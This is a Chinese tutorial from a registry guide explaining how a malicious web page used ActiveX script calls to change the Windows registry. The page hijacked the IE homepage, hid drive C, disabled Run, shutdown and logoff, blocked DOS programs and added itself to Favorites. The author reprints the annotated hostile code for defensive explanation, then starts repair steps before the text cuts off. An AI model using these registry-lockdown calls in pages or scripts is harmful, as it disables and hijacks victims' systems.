浏览网页注册表被修改之迷及解决办法-注册表全攻略。

53、浏览网页注册表被修改之迷及解决办法　 

    浏览网页会被修改注册表？千真万确！如果你去浏览过下面的网页：http://www.findfeel.com/default.htm ，你真有生不如死的感觉！
进入该网页会被：
　　1.修改开始菜单 
　　1）禁止“关闭系统” 
　　2）禁止“运行” 
　　3）禁止“注销” 
　　2.隐藏C盘——你的C盘找不到了
　　3.禁止使用注册表编辑器regedit 
　　4.禁止使用DOS程序
　　5.使系统无法进入“实模式” 
　　6.禁止运行任何程序
　　7.将IE浏览器的首页改为http://www.findfeel.com/，收藏夹中也被加入该网址。
　　那么这些功能恐怖的功能是如何实现的呢？原来，该网页是有人利用Java技术制作的含有有害代码的ActiveX网页文件。为让更多的人了解其危害，我查看了其源代码，将其主要部分列了出来，并加了详细的注释（文中有“注”字的部分是我加的注释）。
注：下面代码是将你的IE默认连接首页改为
http://www.findfeel.com/Shl.RegWrite 
（"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\Start Page", "http://www.findfeel.com/";）; 
注：以下是该网页修改受害者的注册表项所用的招数
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion
\\Policies\\Explorer\\NoRun", 01, "REG_BINARY"）; 
注：使受害者系统没有“运行”项，这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表的修改。
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoClose", 01, "REG_BINARY"）;
注：使受害者系统没有“关闭系统”项
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"）; 
注：使受害者系统没有“注销”项
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD"）;
注：使受害者系统没有逻辑驱动器C
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\WinOldApp\\ Disabled","REG_BINARY"）;
注：禁止运行所有的DOS应用程序；
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\ \WinOldApp\\NoRealMode","REG_BINARY"）;
注：使系统不能启动到“实模式”（传统的DOS模式）下；
又注：进入该网页，它还会修改以下的注册表项，使WINDOWS系统登录时显示一个登录窗口（在MicroSoft网络用户登录之前）
Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Winlogon\\LegalNoticeCaption", "呜啦啦..."）;
注：这些代码会使窗口的标题是“呜啦啦…”
Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Winlogon\\LegalNoticeText", "欢迎你！你这个超级无敌大白痴！《呜啦啦...》故事开始了，按确定进入悲惨世界"）; 
注：上面一行是会在窗口中显示出来的文字
注：下面两行代码修改注册表，使受害者所有的IE窗口都加上以下的标题：“呜啦啦…”
Shl.RegWrite
（"HKLM\\Software\\Microsoft\\Internet Explorer\\Main\Window Title", "呜啦啦..."）; 
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\Window Title", "呜啦啦..."）; 
注：到上面一行为止，完成了对受害者的注册表的所有修改！
注：下面代码用来将其网页增加到受害者的收藏夹中
var WF, Shor, loc; 
WF = FSO.GetSpecialFolder（0）; 
loc = WF + "\\Favorites"; 
if（!FSO.FolderExists（loc）） 
{ loc = FSO.GetDriveName（WF） + "\\Documents and Settings\" + Net.UserName + "\\Favorites"; if（!FSO.FolderExists（loc）） { return; } }
注：下面就是使其网页加入到你的收藏夹的具体代码
AddFavLnk（loc, "找到感www.findfeel.com",
 "http://www.findfeel.com";）; 
　　由于代码很简单，又加了注释，相信你已经看明白是怎么回事了。那么如果不小心进入该网页，并且已经中招了该怎么办呢？别急，下面给你列出了解决的办法。
受害用户的修复方法：
　　1：对于Win9x用户，建议在电脑启动时按F8键，选择到MS-DOS方式下，使用Scanreg/restore命令来恢复以前备份的、正常的注册表。
　　2：对于Win2000用户，把以下内容copy下来，存为unlock.reg文件，选

[1] [2] 下一篇